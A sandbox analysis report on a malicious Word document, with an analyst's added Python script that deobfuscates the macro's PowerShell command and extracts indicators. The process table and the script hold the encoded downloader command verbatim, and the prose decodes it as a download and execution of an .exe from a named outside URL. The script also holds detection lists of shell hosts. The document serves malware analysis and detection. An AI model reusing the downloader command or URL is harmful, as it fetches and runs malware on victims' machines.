File name: | Sidney_Yarbrough.doc_ |
Full analysis: | https://app.any.run/tasks/725b93f2-10be-442d-8614-17b73674fd53 |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 10:30:30 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Title: Exclusive next generation instruction set, Subject: Maine Mark, Author: 1-148-512-6515, Comments: Multi-lateral mission-critical structure, Template: Normal, Last Saved By: Windows, Revision Number: 10, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Thu Apr 19 19:59:00 2018, Last Saved Time/Date: Fri Nov 9 09:10:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 9113C68179F1F4BA043C54A7D9D29A01 |
SHA1: | A26112A3A615BC89508AD04A9B281D41CDF42A09 |
SHA256: | 8586A5C9008E3502471C9ECF2141F4B2411B89A96DBA6C590D49EF4E2202A935 |
SSDEEP: | 1536:qs5ztL6rZMLt09RofluVym3VSyuJDU3nxyL482x+t5:pa8A+t+yZ8zjg5 |
Extension | File type (score)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Property | Value
---|---
Title: | Exclusive next generation instruction set
Subject: | Maine Mark |
Author: | 1-148-512-6515 |
Keywords: | - |
Comments: | Multi-lateral mission-critical structure |
Template: | Normal |
LastModifiedBy: | Пользователь Windows (Russian for "Windows User")
RevisionNumber: | 10 |
Software: | Microsoft Office Word |
TotalEditTime: | 2.0 minutes |
CreateDate: | 2018:04:19 18:59:00 |
ModifyDate: | 2018:11:09 09:10:00 |
Pages: | 1 |
Words: | - |
Characters: | 1 |
Security: | None |
CodePage: | Windows Cyrillic |
Manager: | Elenora D'Amore |
Company: | Stoltenberg, O'Conner and Rice Hanna Kertzmann DDS |
Bytes: | 96256 |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 1 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3556 | "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\admin\AppData\Local\Temp\Sidney_Yarbrough.doc_ | C:\Windows\system32\rundll32.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2648 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Sidney_Yarbrough.doc_" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | rundll32.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3952 | CMd.eXe /c p@o@W@e@r@S@h@e@l@L@.@e@x@e@ @-@e@c@ @K@A@B@O@A@G@U@A@d@w@A@t@A@E@8@A@Y@g@B@q@A@G@U@A@Y@w@B@0@A@C@A@A@U@w@B@5@A@H@M@A@d@A@B@l@A@G@0@A@L@g@B@O@A@G@U@A@d@A@A@u@A@F@c@A@Z@Q@B@i@A@E@M@A@b@A@B@p@A@G@U@A@b@g@B@0@A@C@k@A@L@g@B@E@A@G@8@A@d@w@B@u@A@G@w@A@b@w@B@h@A@G@Q@A@R@g@B@p@A@G@w@A@Z@Q@A@o@A@C@I@A@a@A@B@0@A@H@Q@A@c@A@A@6@A@C@8@A@L@w@B@j@A@H@k@A@d@A@B@o@A@H@I@A@b@w@B@t@A@G@E@A@d@A@B@0@A@C@4@A@Y@w@B@v@A@G@0@A@L@w@B@X@A@E@U@A@U@w@A@v@A@G@Y@A@Y@Q@B@0@A@G@8@A@Z@w@A@u@A@H@A@A@a@A@B@w@A@D@8@A@b@A@A@9@A@G@U@A@a@Q@B@k@A@G@k@A@N@A@A@u@A@H@g@A@Y@Q@B@w@A@C@I@A@L@A@A@g@A@C@Q@A@Z@Q@B@u@A@H@Y@A@O@g@B@B@A@F@A@A@U@A@B@E@A@E@E@A@V@A@B@B@A@C@A@A@K@w@A@g@A@C@c@A@X@A@A@x@A@D@M@A@M@Q@A@x@A@G@M@A@O@A@A@1@A@G@I@A@L@g@B@l@A@H@g@A@Z@Q@A@n@A@C@k@A@O@w@A@g@A@F@M@A@d@A@B@h@A@H@I@A@d@A@A@t@A@F@A@A@c@g@B@v@A@G@M@A@Z@Q@B@z@A@H@M@A@I@A@A@k@A@G@U@A@b@g@B@2@A@D@o@A@Q@Q@B@Q@A@F@A@A@R@A@B@B@A@F@Q@A@Q@Q@A@n@A@F@w@A@M@Q@A@z@A@D@E@A@M@Q@B@j@A@D@g@A@N@Q@B@i@A@C@4@A@Z@Q@B@4@A@G@U@A@J@w@A@7@A@C@A@A@R@Q@B@4@A@G@k@A@d@A@A@= | C:\Windows\system32\CMd.eXe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
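Working notes on the process chain, added here as an analyst's example and not part of the ANY.RUN report. PID 3556 is `rundll32.exe shell32.dll,OpenAs_RunDLL`, the Open With dialog, which is how a file with the unregistered `.doc_` extension ends up in WINWORD.EXE (Office14 path, version 14.0, i.e. Word 2010). Word then spawns cmd.exe with a PowerShell invocation in which an `@` has been inserted between every character, and whose `-ec` argument is base64 of UTF-16LE text. The table lists no powershell.exe child of PID 3952, cmd.exe exited with code 1, and the files table shows nothing written beyond Word's own temporary files, so the decoded script describes the intended next stage rather than activity the sandbox observed. The Python below (my code, not ANY.RUN's or the sample author's) strips the junk character, decodes the payload, pulls out the URL and dropped-file path, and flags the Office-to-shell parent/child relation. The command line and process rows are transcribed from the table above; the junk character, the accepted `-e`/`-ec`/`-enc...` flag prefixes, the Office/shell image lists and the indicator regexes are my assumptions for general use.

```python
"""Triage of the cmd.exe command line from PID 3952 in the process table above.

Added example, not ANY.RUN's or the sample author's code. It strips the '@'
characters interleaved through the PowerShell invocation, decodes the -ec
argument (base64 of UTF-16LE text), extracts URL and file-path indicators
from the decoded script, and flags the WINWORD.EXE -> cmd.exe chain.
"""
import base64
import re

# Copied verbatim from the CMD column of PID 3952 in the process table above.
OBFUSCATED_CMDLINE = "CMd.eXe /c p@o@W@e@r@S@h@e@l@L@.@e@x@e@ @-@e@c@ @K@A@B@O@A@G@U@A@d@w@A@t@A@E@8@A@Y@g@B@q@A@G@U@A@Y@w@B@0@A@C@A@A@U@w@B@5@A@H@M@A@d@A@B@l@A@G@0@A@L@g@B@O@A@G@U@A@d@A@A@u@A@F@c@A@Z@Q@B@i@A@E@M@A@b@A@B@p@A@G@U@A@b@g@B@0@A@C@k@A@L@g@B@E@A@G@8@A@d@w@B@u@A@G@w@A@b@w@B@h@A@G@Q@A@R@g@B@p@A@G@w@A@Z@Q@A@o@A@C@I@A@a@A@B@0@A@H@Q@A@c@A@A@6@A@C@8@A@L@w@B@j@A@H@k@A@d@A@B@o@A@H@I@A@b@w@B@t@A@G@E@A@d@A@B@0@A@C@4@A@Y@w@B@v@A@G@0@A@L@w@B@X@A@E@U@A@U@w@A@v@A@G@Y@A@Y@Q@B@0@A@G@8@A@Z@w@A@u@A@H@A@A@a@A@B@w@A@D@8@A@b@A@A@9@A@G@U@A@a@Q@B@k@A@G@k@A@N@A@A@u@A@H@g@A@Y@Q@B@w@A@C@I@A@L@A@A@g@A@C@Q@A@Z@Q@B@u@A@H@Y@A@O@g@B@B@A@F@A@A@U@A@B@E@A@E@E@A@V@A@B@B@A@C@A@A@K@w@A@g@A@C@c@A@X@A@A@x@A@D@M@A@M@Q@A@x@A@G@M@A@O@A@A@1@A@G@I@A@L@g@B@l@A@H@g@A@Z@Q@A@n@A@C@k@A@O@w@A@g@A@F@M@A@d@A@B@h@A@H@I@A@d@A@A@t@A@F@A@A@c@g@B@v@A@G@M@A@Z@Q@B@z@A@H@M@A@I@A@A@k@A@G@U@A@b@g@B@2@A@D@o@A@Q@Q@B@Q@A@F@A@A@R@A@B@B@A@F@Q@A@Q@Q@A@n@A@F@w@A@M@Q@A@z@A@D@E@A@M@Q@B@j@A@D@g@A@N@Q@B@i@A@C@4@A@Z@Q@B@4@A@G@U@A@J@w@A@7@A@C@A@A@R@Q@B@4@A@G@k@A@d@A@A@="

# (pid, image, parent image) rows transcribed from the process table above.
PROCESS_ROWS = [
    (3556, "rundll32.exe", "explorer.exe"),
    (2648, "WINWORD.EXE", "rundll32.exe"),
    (3952, "CMd.eXe", "WINWORD.EXE"),
]

# Assumed image lists for the parent/child check; extend as needed.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# A "-e..." switch followed by a base64-looking token; the flag is validated separately.
ENCODED_FLAG_RE = re.compile(r"(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.I)
URL_RE = re.compile(r"""https?://[^\s"'()]+""")
EXE_PATH_RE = re.compile(r"[\\/][\w.-]+\.exe", re.I)


def strip_junk(cmdline, junk="@"):
    """Drop the interleaved junk character. cmd.exe treats '@' specially only
    at the start of a line, so inside a token it is literal text; as the table
    shows, this stage produced no powershell.exe child."""
    return cmdline.replace(junk, "")


def _is_encoded_command_flag(flag):
    # PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec.
    f = flag.lower()
    return f == "ec" or "encodedcommand".startswith(f)


def extract_encoded_command(cmdline):
    """Return the base64 token following the encoded-command switch, or None."""
    for m in ENCODED_FLAG_RE.finditer(cmdline):
        if _is_encoded_command_flag(m.group(1)):
            return m.group(2)
    return None


def decode_encoded_command(token):
    """-EncodedCommand carries the script as base64 of UTF-16LE text."""
    return base64.b64decode(token).decode("utf-16-le")


def deobfuscate(cmdline, junk="@"):
    """Full pipeline: strip junk, locate the -ec token, decode to PowerShell text."""
    token = extract_encoded_command(strip_junk(cmdline, junk))
    if token is None:
        raise ValueError("no encoded-command argument found")
    return decode_encoded_command(token)


def extract_iocs(script):
    """URLs and .exe paths referenced by the decoded script, deduplicated in order."""
    def uniq(items):
        seen, out = set(), []
        for item in items:
            if item not in seen:
                seen.add(item)
                out.append(item)
        return out
    return {"urls": uniq(URL_RE.findall(script)),
            "exe_paths": uniq(EXE_PATH_RE.findall(script))}


def office_spawned_shell(rows):
    """PIDs whose parent is an Office application and whose image is a shell or script host."""
    return [pid for pid, image, parent in rows
            if parent.lower() in OFFICE_APPS and image.lower() in SHELLS]


if __name__ == "__main__":
    decoded = deobfuscate(OBFUSCATED_CMDLINE)
    print("decoded :", decoded)
    print("iocs    :", extract_iocs(decoded))
    print("flagged :", office_spawned_shell(PROCESS_ROWS))
```

Decoded, the script is a `System.Net.WebClient.DownloadFile` of `http://cythromatt.com/WES/fatog.php?l=eidi4.xap` to `$env:APPDATA\1311c85b.exe` followed by `Start-Process` on that file and `Exit`; the URL and the dropped-file path are the indicators worth adding to the empty Indicators row above, with the caveat that neither the download nor the file write appears in this run.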
PID | Process | Filename | Type | |
---|---|---|---|---|
2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRDDF7.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$dney_Yarbrough.doc_ | pgc | |
MD5:C12C34027668605AFBD9EDA0B860E57C | SHA256:75D26FC05651695B7F3E0541FEC613A23E29799034BD54048586060B68DBC763 | |||
2648 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6138494EE04D6A4CE79A0DEF20DD36BE | SHA256:779BB61888F5B173AD0A1EE9015E28554E14054B70F520191C3B6670226647BB |